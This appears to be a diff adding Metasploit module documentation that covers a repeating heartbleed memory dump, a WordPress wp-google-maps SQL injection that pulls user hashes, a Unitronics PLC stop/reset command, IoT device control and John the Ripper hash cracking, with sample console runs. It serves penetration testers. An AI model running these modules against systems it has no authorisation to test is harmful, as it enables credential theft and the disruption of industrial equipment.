+
+The `repeat` command repeats one or more console commands for a fixed number of
+times, a certain length of time, or forever. The repeat command is most useful
+for repeating module runs like memory dumpers or scanners that have a random
+element to them.
+
+Usage
+-----
+
+### Flags
+
+#### -t, --time SECONDS
+
+Start the list of commands until the number of seconds has elapsed.
+
+#### -n, --number TIMES
+
+Start the list of commands a fixed number of times.
+
+#### -h, --help
+
+Display the help banner.
+
+
+
+Examples
+--------
+
+Run the heartbleed module every 10 seconds against a server for an hour:
+
+    msf5 > use auxiliary/scanner/ssl/openssl_heartbleed
+    msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set ACTION DUMP
+    # Set other options...
+    msf5 auxiliary(scanner/ssl/openssl_heartbleed) > repeat -t 3600 run; sleep 10
+
@@ -2,9 +2,11 @@ This module plays (by default) ["Epic sax guy 10 hours"](https://www.youtube.com

 Naturally, audio should be cranked to 11 before running this module.

+Only the deprecated DIAL protocol is supported by this module. Casting via the newer CASTV2 protocol is unsupported at this time.
+
 ## Verification Steps

-1. Do: ```use auxiliary/scanner/http/chromecast_webserver ```
+1. Do: ```use auxiliary/admin/chromecast/chromecast_youtube```
 2. Do: ```set RHOST [IP]```
 3. Do: ```run```

@@ -0,0 +1,33 @@
+## Vulnerable Application
+
+This module works against the Wordpress plugin `wp-google-maps` between 7.11.00 and 7.11.17 (included).
+
+[The vulnerable version is available on WordPress' plugin directory](https://downloads.wordpress.org/plugin/wp-google-maps.7.11.17.zip).
+
+## Verification Steps
+
+  1. `msfconsole`
+  2. `use auxiliary/admin/http/wp_google_maps_sqli`
+  3. `set RHOSTS <rhost>`
+  4. Set `DB_PREFIX` if necessary
+  5. `run`
+
+## Options
+
+### `DB_PREFIX` 
+
+Change the table prefix. By default, this option is set to `wp_`.
+
+## Scenarios
+
+### wp-google-maps 7.11.17 on WordPress 4.9.5
+
+```
+msf5 auxiliary(admin/http/wp_google_maps_sqli) > exploit
+[*] Running module against 172.22.222.144
+
+[*] 172.22.222.144:80 - Trying to retrieve the wp_users table...
+[+] Credentials saved in: /home/msfdev/.msf4/loot/20190415065921_default_172.22.222.144_wp_google_maps.j_022930.bin
+[+] 172.22.222.144:80 - Found msfdev <hash> <email>
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,34 @@
+## Vulnerable Application
+
+  Unitronics Vision PLCs
+
+## Verification Steps
+
+  1. Do: `use auxiliary/admin/scada/pcom_command`
+  2. Do: `set RHOST=IP` where IP is the IP address of the target
+  3. Do: `run` to send PCOM command
+
+ ## Scenarios
+
+   ```
+msf5 > use auxiliary/admin/scada/pcom_command
+msf5 auxiliary(admin/scada/pcom_command) > show options
+
+Module options (auxiliary/admin/scada/pcom_command):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   MODE    RESET            yes       PLC command (Accepted: START, STOP, RESET)
+   RHOST                    yes       The target address
+   RPORT   20256            yes       The target port (TCP)
+   UNITID  0                no        Unit ID (0 - 127)
+
+msf5 auxiliary(admin/scada/pcom_command) > set RHOST 192.168.1.1
+RHOST => 192.168.1.1
+msf5 auxiliary(admin/scada/pcom_command) > run
+
+[*] 192.168.1.1:20256 - Sending RESET command
+[*] 192.168.1.1:20256 - Command accepted
+[*] Auxiliary module execution completed
+msf5 auxiliary(admin/scada/pcom_command) >
+```
@@ -0,0 +1,60 @@
+## Intro
+
+This module acts as a simple remote control for Belkin Wemo-enabled
+Crock-Pots by implementing a subset of the functionality provided by the
+Wemo App.
+
+No vulnerabilities are exploited by this Metasploit module in any way.
+
+## Setup
+
+You may buy the device on Amazon at <https://www.amazon.com/dp/B00IPEO02C/>.
+
+## Actions
+
+```
+Available actions:
+  Name  Description
+  ----  -----------
+  Cook  Cook stuff
+  Stop  Stop cooking
+```
+
+## Options
+
+**TEMP**
+
+Set this to the desired temperature for cooking. Valid values are `Off`,
+`Warm`, `Low`, and `High`.
+
+**TIME**
+
+Set this to the desired cook time in full minutes.
+
+**DefangedMode**
+
+Set this to `false` to disable defanged mode and enable module
+functionality. Set this only if you're SURE you want to proceed.
+
+## Usage
+
+```
+msf5 > use auxiliary/admin/wemo/crockpot
+msf5 auxiliary(admin/wemo/crockpot) > set rhosts 10.22.22.1
+rhosts => 10.22.22.1
+msf5 auxiliary(admin/wemo/crockpot) > set temp High
+temp => High
+msf5 auxiliary(admin/wemo/crockpot) > set time 1
+time => 1
+msf5 auxiliary(admin/wemo/crockpot) > set defangedmode false
+defangedmode => false
+msf5 auxiliary(admin/wemo/crockpot) > set verbose true
+verbose => true
+msf5 auxiliary(admin/wemo/crockpot) > run
+
+[+] Wemo-enabled Crock-Pot detected
+[*] Cooking on High for 1m
+[+] Cook time set to 1m
+[*] Auxiliary module execution completed
+msf5 auxiliary(admin/wemo/crockpot) >
+```
@@ -0,0 +1,185 @@
+## Vulnerable Application
+
+  This module applies a john the ripper (or hashcat) style .pot file to hashes in the database.
+  This will allow very fast cracking of all supported hash types which have already been cracked.
+
+## Verification Steps
+
+  1. Have at least one set of hashes in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/apply_pot```
+  4. Do: ```run```
+  5. You should hopefully crack a password.
+
+## Options
+
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **JOHN_PATH**
+
+   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
+   `john` and `john.exe`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
+## Scenarios
+
+In this scenario, we fill a bunch of different hash types into the creds db.  You'll need a
+.pot file with the cracked hashes, the following can be used:
+
+```
+rEK1ecacw.7.c:password
+_J9..K0AyUubDrfOgO4s:password
+$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe:password
+yhMEAyLkfWqeQ:se
+$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/:password
+$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5:password
+$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1:password
+0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8:foo
+0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908:toto
+0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254:FOO
+0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16:Password1!
+445ff82636a7ba59:probe
+*5AD8F88516BD021DD43F171E2C785C69F8E54ADB:tere
+O$SIMON#4f8bc1809cb2af77:A
+O$SYSTEM#9eedfa0ad26c6d52:THALES
+8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A:epsilon
+$oracle12c$e3243b98974159cc24fd2c9a8b30ba62e0e83b6ca2fc7c55177c3a7f82602e3bdd17ceb9b9091cf9dad672b8be961a9eac4d344bdba878edc5dcb5899f689ebd8dd1be3f67bff9813a464382381ab36b:epsilon
+$dynamic_1034$be86a79bf2043622d58d5453c47d4860$HEX$24556578616d706c65:password
+$LM$ac404c4ba2c66533:ASE
+$LM$4a3b108f3fa6cb6d:D
+$LM$e52cac67419a9a22:PASSWOR
+$NT$8846f7eaee8fb117ad06bdd830b7586c:password
+```
+
+```
+resource (hashes_pot.rb)> creds -d
+Credentials
+===========
+
+host  origin  service  public  private  realm  private_type  JtR Format
+----  ------  -------  ------  -------  -----  ------------  ----------
+
+resource (hashes_pot.rb)> creds add user:des_password hash:rEK1ecacw.7.c jtr:des
+resource (hashes_pot.rb)> creds add user:md5_password hash:$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/ jtr:md5
+resource (hashes_pot.rb)> creds add user:bsdi_password hash:_J9..K0AyUubDrfOgO4s jtr:bsdi
+resource (hashes_pot.rb)> creds add user:sha256_password hash:$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5 jtr:sha256,crypt
+resource (hashes_pot.rb)> creds add user:sha512_password hash:$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1 jtr:sha512,crypt
+resource (hashes_pot.rb)> creds add user:blowfish_password hash:$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe jtr:bf
+resource (hashes_pot.rb)> creds add user:lm_password ntlm:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C jtr:lm
+resource (hashes_pot.rb)> creds add user:nt_password ntlm:AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C jtr:nt
+resource (hashes_pot.rb)> creds add user:mssql05_toto hash:0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908 jtr:mssql05
+resource (hashes_pot.rb)> creds add user:mssql_foo hash:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254 jtr:mssql
+resource (hashes_pot.rb)> creds add user:mssql12_Password1! hash:0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16 jtr:mssql12
+resource (hashes_pot.rb)> creds add user:mysql_probe hash:445ff82636a7ba59 jtr:mysql
+resource (hashes_pot.rb)> creds add user:mysql-sha1_tere hash:*5AD8F88516BD021DD43F171E2C785C69F8E54ADB jtr:mysql-sha1
+resource (hashes_pot.rb)> creds add user:simon hash:4F8BC1809CB2AF77 jtr:des,oracle
+resource (hashes_pot.rb)> creds add user:SYSTEM hash:9EEDFA0AD26C6D52 jtr:des,oracle
+resource (hashes_pot.rb)> creds add user:DEMO hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
+resource (hashes_pot.rb)> creds add user:oracle11_epsilon hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
+resource (hashes_pot.rb)> creds add user:oracle12c_epsilon hash:'H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B' jtr:pbkdf2,oracle12c
+resource (hashes_pot.rb)> creds add user:example postgres:md5be86a79bf2043622d58d5453c47d4860
+resource (hashes_pot.rb)> use auxiliary/analyze/apply_pot
+resource (hashes_pot.rb)> run
+[*] Hashes Written out to /tmp/hashes_tmp20190203-16380-1974mdz
+[*] Checking bcrypt hashes against pot file
+[+] blowfish_password:password
+[*] Checking bsdicrypt hashes against pot file
+[+] bsdi_password:password
+[*] Checking crypt hashes against pot file
+Warning: hash encoding string length 46, type id $d
+appears to be unsupported on this system; will not load such hashes.
+[+] des_password:password
+[+] md5_password:password
+[+] sha256_password:password
+[+] sha512_password:password
+[*] Checking descrypt hashes against pot file
+[+] des_password:password
+[*] Checking lm hashes against pot file
+[+] lm_password:password
+[*] Checking nt hashes against pot file
+[+] lm_password:password
+[+] nt_password:password
+[*] Checking md5crypt hashes against pot file
+[+] md5_password:password
+[*] Checking mysql hashes against pot file
+[+] mysql_probe:probe
+[*] Checking mysql-sha1 hashes against pot file
+[+] mysql-sha1_tere:tere
+[*] Checking mssql hashes against pot file
+[+] mssql_foo:FOO
+[*] Checking mssql05 hashes against pot file
+[+] mssql05_toto:toto
+[+] mssql_foo:foo
+[*] Checking mssql12 hashes against pot file
+[+] mssql12_Password1!:Password1!
+[*] Checking oracle hashes against pot file
+[+] simon:A
+[+] SYSTEM:THALES
+[*] Checking oracle11 hashes against pot file
+[+] DEMO:epsilon
+[+] oracle11_epsilon:epsilon
+[*] Checking oracle12c hashes against pot file
+[+] oracle12c_epsilon:epsilon
+[*] Checking dynamic_1506 hashes against pot file
+[*] Checking dynamic_1034 hashes against pot file
+[+] example:password
+[*] Auxiliary module execution completed
+resource (hashes_pot.rb)> creds
+Credentials
+===========
+
+host  origin  service  public              private                                                                                                                                                                                                                                                               realm  private_type        JtR Format
+----  ------  -------  ------              -------                                                                                                                                                                                                                                                               -----  ------------        ----------
+                       des_password        password                                                                                                                                                                                                                                                                     Password            
+                       des_password        rEK1ecacw.7.c                                                                                                                                                                                                                                                                Nonreplayable hash  des
+                       md5_password        password                                                                                                                                                                                                                                                                     Password            
+                       md5_password        $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/                                                                                                                                                                                                                                           Nonreplayable hash  md5
+                       bsdi_password       password                                                                                                                                                                                                                                                                     Password            
+                       bsdi_password       _J9..K0AyUubDrfOgO4s                                                                                                                                                                                                                                                         Nonreplayable hash  bsdi
+                       sha256_password     password                                                                                                                                                                                                                                                                     Password            
+                       sha256_password     $5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5                                                                                                                                                                                                                      Nonreplayable hash  sha256,crypt
+                       sha512_password     password                                                                                                                                                                                                                                                                     Password            
+                       sha512_password     $6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1                                                                                                                                                                           Nonreplayable hash  sha512,crypt
+                       blowfish_password   password                                                                                                                                                                                                                                                                     Password            
+                       blowfish_password   $2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe                                                                                                                                                                                                                 Nonreplayable hash  bf
+                       lm_password         password                                                                                                                                                                                                                                                                     Password            
+                       lm_password         e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c                                                                                                                                                                                                            NTLM hash           nt,lm
+                       nt_password         password                                                                                                                                                                                                                                                                     Password            
+                       nt_password         aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c                                                                                                                                                                                                            NTLM hash           nt,lm
+                       mssql05_toto        toto                                                                                                                                                                                                                                                                         Password            
+                       mssql05_toto        0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908                                                                                                                                                                                                                       Nonreplayable hash  mssql05
+                       mssql_foo           foo                                                                                                                                                                                                                                                                          Password            
+                       mssql_foo           FOO                                                                                                                                                                                                                                                                          Password            
+                       mssql_foo           0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254                                                                                                                                                                               Nonreplayable hash  mssql
+                       mssql12_Password1!  Password1!                                                                                                                                                                                                                                                                   Password            
+                       mssql12_Password1!  0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16                                                                                                                               Nonreplayable hash  mssql12
+                       mysql_probe         probe                                                                                                                                                                                                                                                                        Password            
+                       mysql_probe         445ff82636a7ba59                                                                                                                                                                                                                                                             Nonreplayable hash  mysql
+                       mysql-sha1_tere     tere                                                                                                                                                                                                                                                                         Password            
+                       mysql-sha1_tere     *5AD8F88516BD021DD43F171E2C785C69F8E54ADB                                                                                                                                                                                                                                    Nonreplayable hash  mysql-sha1
+                       simon               A                                                                                                                                                                                                                                                                            Password            
+                       simon               4F8BC1809CB2AF77                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
+                       SYSTEM              THALES                                                                                                                                                                                                                                                                       Password            
+                       SYSTEM              9EEDFA0AD26C6D52                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
+                       DEMO                epsilon                                                                                                                                                                                                                                                                      Password            
+                       DEMO                S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
+                       oracle11_epsilon    epsilon                                                                                                                                                                                                                                                                      Password            
+                       oracle11_epsilon    S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
+                       oracle12c_epsilon   epsilon                                                                                                                                                                                                                                                                      Password            
+                       oracle12c_epsilon   H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B                                                                        Nonreplayable hash  pbkdf2,oracle12c
+                       example             password                                                                                                                                                                                                                                                                     Password            
+                       example             md5be86a79bf2043622d58d5453c47d4860                                                                                                                                                                                                                                          Postgres md5        raw-md5,postgres
+```
@@ -0,0 +1,141 @@
+## Vulnerable Application
+
+  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode AIX 
+  based password hashes, such as:
+
+  * `DES` based passwords
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+## Verification Steps
+
+  1. Have at least one user with a `des` password in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/jtr_aix```
+  4. Do: ```run```
+  5. You should hopefully crack a password.
+
+## Options
+
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking
+
+   **JOHN_PATH**
+
+   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
+   `john` and `john.exe`.
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+## Scenarios
+
+Create hashes:
+
+```
+creds add user:des_password hash:rEK1ecacw.7.c jtr:des
+creds add user:des_passphrase hash:qiyh4XPJGsOZ2MEAyLkfWqeQ jtr:des
+```
+
+Crack them:
+
+```
+[*] Hashes Written out to /tmp/hashes_tmp20190211-5021-1p3x0lx
+[*] Wordlist file written out to /tmp/jtrtmp20190211-5021-66w3u0
+[*] Cracking descrypt hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+0g 0:00:00:00 DONE (2019-02-11 19:29) 0g/s 4206Kp/s 4206Kc/s 4206KC/s scandal..vagrant
+Session completed
+[*] Cracking descrypt hashes in single mode...
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+0g 0:00:00:05 DONE (2019-02-11 19:29) 0g/s 6681Kp/s 6681Kc/s 6681KC/s qt1902..tude1900
+Session completed
+[*] Cracking descrypt hashes in incremental mode (Digits)...
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Warning: MaxLen = 20 is too large for the current hash type, reduced to 8
+Press 'q' or Ctrl-C to abort, almost any other key for status
+0g 0:00:00:05 DONE (2019-02-11 19:29) 0g/s 21083Kp/s 21083Kc/s 21083KC/s 73602400..73673952
+Session completed
+[*] Cracked Passwords this run:
+[+] des_password:password
+[+] des_passphrase:????????se
+[*] Auxiliary module execution completed
+msf5 auxiliary(analyze/jtr_aix) > creds
+Credentials
+===========
+
+host  origin  service  public          private                   realm  private_type        JtR Format
+----  ------  -------  ------          -------                   -----  ------------        ----------
+                       des_passphrase  ????????se                       Password            
+                       des_passphrase  qiyh4XPJGsOZ2MEAyLkfWqeQ         Nonreplayable hash  des
+                       des_password    rEK1ecacw.7.c                    Nonreplayable hash  des
+                       des_password    password                         Password            
+
+```
@@ -0,0 +1,176 @@
+## Vulnerable Application
+
+  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Linux
+  based password hashes, such as:
+
+  * `DES` based passwords  
+  * `MD5` based passwords
+  * `BSDi` based passwords
+  * With `crypt` set to `true`:
+    * `bf`, `bcrypt`, or `blowfish` based passwords
+    * `SHA256` based passwords
+    * `SHA512` based passwords
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+  The definition of `crypt` according to JTR and waht algorithms it decodes can be found
+  [here](https://github.com/magnumripper/JohnTheRipper/blob/ae24a410baac45bb36884d793c429adeb7197336/src/c3_fmt.c#L731)
+
+## Verification Steps
+
+  1. Have at least one user with an `des`, `md5`, `bsdi`, `crypt`, `blowfish`, `sha512`, or `sha256` password hash in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/jtr_linux```
+  4. Do: ```run```
+  5. You should hopefully crack a password.
+
+## Options
+
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CRYPT**
+
+   Include `blowfish` and `SHA`(256/512) passwords.
+
+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking
+
+   **JOHN_PATH**
+
+   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
+   `john` and `john.exe`.
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+## Scenarios
+
+Create hashes:
+
+```
+creds add user:des_password hash:rEK1ecacw.7.c jtr:des
+creds add user:md5_password hash:$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/ jtr:md5
+creds add user:bsdi_password hash:_J9..K0AyUubDrfOgO4s jtr:bsdi
+creds add user:sha256_password hash:$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5 jtr:sha256,crypt
+creds add user:sha512_password hash:$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1 jtr:sha512,crypt
+creds add user:blowfish_password hash:$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe jtr:bf
+```
+
+Crack them:
+
+```
+msf5 > use auxiliary/analyze/jtr_linux 
+msf5 auxiliary(analyze/jtr_linux) > set crypt true
+crypt => true
+msf5 auxiliary(analyze/jtr_linux) > run
+
+[*] Hashes Written out to /tmp/hashes_tmp20190211-5021-hqwf2h
+[*] Wordlist file written out to /tmp/jtrtmp20190211-5021-1ixz59k
+[*] Cracking md5crypt hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] md5_password:password
+[*] Cracking descrypt hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] des_password:password
+[*] Cracking bsdicrypt hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] bsdi_password:password
+[*] Cracking crypt hashes in normal wordlist mode...
+Warning: hash encoding string length 20, type id #4
+appears to be unsupported on this system; will not load such hashes.
+Warning: hash encoding string length 60, type id $2
+appears to be unsupported on this system; will not load such hashes.
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] des_password:password
+[+] md5_password:password
+[+] sha256_password:password
+[+] sha512_password:password
+[*] Cracking bcrypt hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] blowfish_password:password
+[*] Auxiliary module execution completed
+msf5 auxiliary(analyze/jtr_linux) > creds
+Credentials
+===========
+
+host  origin  service  public             private                                                                                             realm  private_type        JtR Format
+----  ------  -------  ------             -------                                                                                             -----  ------------        ----------
+                       bsdi_password      password                                                                                                   Password            
+                       des_password       password                                                                                                   Password            
+                       sha256_password    $5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5                                                    Nonreplayable hash  sha256,crypt
+                       md5_password       password                                                                                                   Password            
+                       md5_password       $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/                                                                         Nonreplayable hash  md5
+                       bsdi_password      _J9..K0AyUubDrfOgO4s                                                                                       Nonreplayable hash  bsdi
+                       sha512_password    password                                                                                                   Password            
+                       blowfish_password  $2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe                                               Nonreplayable hash  bf
+                       sha512_password    $6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1         Nonreplayable hash  sha512,crypt
+                       sha256_password    password                                                                                                   Password            
+                       des_password       rEK1ecacw.7.c                                                                                              Nonreplayable hash  des
+                       blowfish_password  password                                                                                                   Password            
+
+```
@@ -0,0 +1,157 @@
+## Vulnerable Application
+
+  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Microsoft
